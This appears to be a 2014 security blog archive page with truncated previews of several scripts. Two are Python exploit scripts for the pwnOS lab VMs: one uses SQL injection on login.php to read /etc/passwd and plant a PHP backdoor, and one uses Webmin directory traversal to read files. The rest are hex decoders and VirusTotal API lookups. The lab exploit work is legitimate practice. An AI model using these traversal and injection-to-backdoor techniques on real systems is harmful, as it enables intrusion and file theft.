Posts

Showing posts from March, 2014

Another Hex to ASCII Deobfuscator

#!/bin/bash

# Written: December 2012
# Modified: March 2014

# This program is built to decode hex to ASCII text
# The program takes what it is given at the command line and then decodes it...

testInput=$1

# echo $testInput -- If you echo it will read the string from the command line
# cat $testInput -- Takes the filename and decodes it
cat $testInput | sed 's/\\x20/ /g' | \
        sed 's/\\x21/!/g' | sed 's/\\x22/"/g' | sed 's/\\x23/#/g' | sed 's/\\x24/$/g' | \
        sed 's/\\x25/\\x/g' | sed 's/\\x26/&/g' | sed "s/\\x27/'/g" | sed 's/\\x28/(/g' | \
        sed 's/\\x29/)/g' | sed 's/\\x2A/*/g' | sed 's/\\x2B/+/g' | sed 's/\\x2C/,/g' | \
        sed 's/\\x2D/-/g' | sed 's/\\x2E/./g' | sed 's/\\x2F/\//g' | sed 's/\\x30/0/g' | \
        sed 's/\\x31/1/g' | sed 's/\\x32/2/g' | sed 's/\\x33/3/g' | sed 's/\\x34/4/g' | \

pwnOS v2.0 - Python Script that utilizes SQL Injection on Login

I wrote this python script to demonstrate SQL injection on pwnOS v2.0.  When it runs it will automate finding the username that the pwnOS database is running as, the displaying of the /etc/passwd file, and the creating of a simple-backdoor.php in the /var/www directory as sb.php.

The sql injection occurs on the login.php page of pwnOS v2.0 at /var/www/login.php.

#!/usr/bin/python

import socket
import os, sys

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.10.100', 80))

# Initial HTTP Request to obtain a PHP Session
httpRequest = "GET /index.php HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"

s.send(httpRequest)
data = s.recv(1024)

#Save the httpResponse to a file
f = open('temp.txt','w')
f.write(data)
f.close()

# Pull the PHPSESSID out of the file
with open("temp.txt") as file:
        for line in file:
                if 'PHPSESSID' in line:
                        sessionID = line[12:48]

s.recv(1024)

httpRequest …

pwnOS v1.0 Python Script for Reading files through Directory Traversal

I was working with the pwnOS v1.0 to be able to gain root.  One of the steps was to use a directory traversal flaw in miniserv to read files on the filesystem.  I liked the metasploit module but I found that I wanted a quicker script and something I could save the output with.  I then designed the following script using python:

#!/usr/bin/python

# This script was build off of the concept of the metasploit auxiliary plugin for displaying files on Webmin due to a directory traversal vulnerability.  This allows you to put in place the file that you would like to pull and retrieve it quicker than if you are in maetasploit.  You can also redirect the output to a file.


import socket
import os, sys
import urllib

if len(sys.argv) > 1:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.11.151',10000))

        # Found that the %01 can be substituted for other characters.
url = "/unauthenticated/" + "/..%01"*40 + sys.argv[1]

httpRequest = "GE…

Decode Hex to ASCII Bash Script

cat $1 | sed 's/%20/ /g' | sed 's/%22/"/g' | sed 's/%28/(/g' | sed 's/%29/)/g' | sed 's/%3E/>/g' | \
            sed 's/%3D/=/g'  | sed 's/%3B/;/g' | sed 's/%7C/|/g'  | sed 's/%2C/,/g' | \
            sed 's/%7B/{/g' | sed 's/%7D/}/g' | sed 's/%3C/</g' | sed 's/%3F/?/g' | sed 's@%2F@/@g' | \
            sed 's/%0A/\n/g' | sed "s/%27/'/g" | sed 's/%26/\&/g' | sed 's/%3A/:/g' | \
            sed 's/%5C/\\/g' | sed 's/%2B/+/g' | sed 's/%21/!/g'

VirusTotal API Submission - Domain Report

This is helpful:

#!/usr/bin/python

import json
import urllib
import urllib2
import sys
import pprint

url = "https://www.virustotal.com/vtapi/v2/domain/report"

if (len(sys.argv) > 1):
        submitDomain = sys.argv[1]
        parameters = {"domain": submitDomain,   "apikey": "---API Key---"}
        response = urllib.urlopen('%s?%s' % (url, urllib.urlencode(parameters))).read()
        response_dict = json.loads(response)
        #print response_dict
        print json.dumps(response_dict, indent=4)
else:
        print "Usage: ./domainReport.py <domain>"

VirusTotal API Submission - Submit URL

Found this to be helpful:

#!/usr/bin/python

import json
import simplejson
import urllib
import urllib2
import sys

url = "https://www.virustotal.com/vtapi/v2/url/scan"

if (len(sys.argv) > 1):
        submitURL = sys.argv[1]
        parameters = {"url": submitURL, "apikey": "---API Key---"}
        data = urllib.urlencode(parameters)
        req = urllib2.Request(url,data)
        response = urllib2.urlopen(req)
        output = json.loads(response.read())
        print json.dumps(output, indent=4)
else:
        print "Usage: ./submitURL <url>"

VirusTotal API Submission - IP Address Report

Found this to be helpful in gathering reports about IP Addresses:

#!/usr/bin/python

import json
import urllib
import urllib2
import sys
import pprint

url = "https://www.virustotal.com/vtapi/v2/ip-address/report"

if (len(sys.argv) > 1):
        submitIP = sys.argv[1]
        parameters = {"ip": submitIP,   "apikey": "---API Key---"}
        response = urllib.urlopen('%s?%s' % (url, urllib.urlencode(parameters))).read()
        response_dict = json.loads(response)
        #print response_dict
        print json.dumps(response_dict, indent=4)
else:
        print "Usage: ./ipAddressReport <ip>"